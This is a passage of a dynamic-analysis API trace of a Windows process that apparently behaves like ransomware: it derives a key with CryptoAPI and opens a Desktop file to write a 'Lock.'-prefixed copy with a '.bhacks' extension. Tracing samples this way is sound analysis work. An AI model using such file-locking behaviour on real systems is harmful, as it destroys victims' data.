[0106.984] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0106.984] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0106.984] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0106.984] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0106.984] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0106.984] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0106.984] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0106.984] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0106.984] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0106.984] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0106.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9ca0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0106.984] CryptCreateHash (in: hProv=0x9bef78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0106.984] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.984] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.985] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.985] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0106.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a48, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0106.985] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0106.985] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0106.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a08, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0106.985] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.985] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0106.985] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0106.985] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0106.985] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0106.985] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0106.985] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0106.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9cd0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0106.985] CryptHashData (hHash=0x9a3b80, pbData=0x2a718f8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0106.985] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.985] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.985] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.985] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0106.986] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0106.986] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0106.986] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0106.986] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0106.986] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0106.986] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0106.986] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0106.986] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0106.986] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0106.986] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0106.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9c58, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0106.986] CryptDeriveKey (in: hProv=0x9bef78, Algid=0x6601, hBaseData=0x9a3b80, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a4580) returned 1 [0106.986] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.986] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.986] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.986] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.987] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.987] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.987] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0106.987] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0106.987] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0106.987] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0106.987] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0106.987] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0106.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0106.987] CryptDestroyHash (hHash=0x9a3b80) returned 1 [0106.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0106.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0106.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0106.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0106.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0106.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0106.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0106.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0106.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0106.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0106.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0106.988] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0106.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0106.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0106.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0106.988] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0106.988] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.988] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.988] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0106.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0106.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0106.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0106.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0106.988] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/WLViPvkU.mp4.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\wlvipvku.mp4.bhacks"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x44c [0106.988] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.988] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0106.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70a0 [0106.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0106.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0106.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0106.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0106.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0106.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0106.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0106.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0106.989] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0106.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0106.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0106.989] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0106.989] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0106.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0106.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0106.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0106.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0106.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0106.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0106.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0106.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0106.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0106.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0106.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0106.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0106.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0106.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0106.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0106.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0106.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0106.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0106.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a756f0 [0106.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0106.990] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0106.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a756f0 | out: hHeap=0x2af0000) returned 1 [0106.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0106.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0106.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2abe880 [0106.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0106.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0106.990] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.WLViPvkU.mp4.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.wlvipvku.mp4.bhacks"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0106.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70c0 [0106.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0106.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0106.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0106.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0106.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0106.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0106.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0106.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0106.991] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0106.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0106.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0106.991] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0106.991] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0106.991] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0106.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0106.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0106.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0106.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0106.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0106.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0106.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0106.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0106.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0106.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0106.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0106.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0106.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0106.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0106.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0106.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0106.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0106.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0106.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0106.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0106.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0106.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0106.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0106.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0106.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0106.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0106.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0106.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0106.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0106.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0106.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4cae020 [0106.995] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 